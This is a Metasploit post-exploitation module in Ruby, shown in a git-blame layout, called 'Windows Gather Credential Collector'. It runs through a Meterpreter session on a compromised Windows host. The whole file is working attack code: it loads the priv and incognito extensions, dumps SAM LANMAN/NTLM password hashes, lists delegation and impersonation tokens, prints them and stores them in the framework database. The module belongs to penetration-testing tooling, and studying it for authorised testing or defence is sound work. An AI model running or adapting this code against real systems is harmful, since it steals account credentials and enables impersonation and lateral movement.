2011-03-20 17:42:37 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# ## This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-03-20 17:42:37 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core/post/common'
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::Common
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
2011-04-27 16:25:15 +00:00
|
|
|
'Name' => 'Windows Gather Credential Collector',
|
2011-07-27 02:39:49 +00:00
|
|
|
'Description' => %q{ This module harvests credentials found on the host and stores them in the database.},
|
2011-03-20 17:42:37 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'tebo[at]attackresearch.com'],
|
|
|
|
'Version' => '$Revision$',
|
2012-10-23 18:33:01 +00:00
|
|
|
'Platform' => [ 'win' ],
|
2011-03-20 17:42:37 +00:00
|
|
|
'SessionTypes' => [ 'meterpreter']
|
|
|
|
))
|
2011-11-20 01:53:25 +00:00
|
|
|
|
2011-03-20 17:42:37 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Run Method for when run command is issued
|
|
|
|
def run
|
|
|
|
print_status("Running module against #{sysinfo['Computer']}")
|
|
|
|
# Collect even without a database to store them.
|
|
|
|
if session.framework.db.active
|
|
|
|
db_ok = true
|
|
|
|
else
|
|
|
|
db_ok = false
|
|
|
|
end
|
|
|
|
|
|
|
|
# Make sure we're rockin Priv and Incognito
|
2012-02-23 21:52:48 +00:00
|
|
|
session.core.use("priv") if not session.priv
|
|
|
|
session.core.use("incognito") if not session.incognito
|
2011-03-20 17:42:37 +00:00
|
|
|
|
|
|
|
# It wasn't me mom! Stinko did it!
|
|
|
|
hashes = client.priv.sam_hashes
|
|
|
|
|
|
|
|
# Target infos for the db record
|
|
|
|
addr = client.sock.peerhost
|
|
|
|
# client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
|
|
|
|
|
|
|
|
# Record hashes to the running db instance
|
|
|
|
print_good "Collecting hashes..."
|
2011-12-24 21:06:43 +00:00
|
|
|
|
2011-03-20 17:42:37 +00:00
|
|
|
hashes.each do |hash|
|
|
|
|
data = {}
|
|
|
|
data[:host] = addr
|
|
|
|
data[:port] = 445
|
|
|
|
data[:sname] = 'smb'
|
|
|
|
data[:user] = hash.user_name
|
|
|
|
data[:pass] = hash.lanman + ":" + hash.ntlm
|
|
|
|
data[:type] = "smb_hash"
|
2011-12-24 21:06:43 +00:00
|
|
|
if not session.db_record.nil?
|
|
|
|
data[:source_id] = session.db_record.id
|
|
|
|
end
|
2011-11-08 03:34:49 +00:00
|
|
|
data[:source_type] = "exploit",
|
2011-03-20 17:42:37 +00:00
|
|
|
data[:active] = true
|
|
|
|
|
|
|
|
print_line " Extracted: #{data[:user]}:#{data[:pass]}"
|
|
|
|
report_auth_info(data) if db_ok
|
|
|
|
end
|
|
|
|
|
|
|
|
# Record user tokens
|
|
|
|
tokens = session.incognito.incognito_list_tokens(0)
|
|
|
|
raise Rex::Script::Completed if not tokens
|
|
|
|
|
|
|
|
# Meh, tokens come to us as a formatted string
|
|
|
|
print_good "Collecting tokens..."
|
|
|
|
(tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token|
|
|
|
|
data = {}
|
|
|
|
data[:host] = addr
|
|
|
|
data[:type] = 'smb_token'
|
|
|
|
data[:data] = token
|
|
|
|
data[:update] = :unique_data
|
|
|
|
|
|
|
|
print_line " #{data[:data]}"
|
|
|
|
report_note(data) if db_ok
|
|
|
|
end
|
|
|
|
end
|
2011-07-27 02:39:49 +00:00
|
|
|
end
|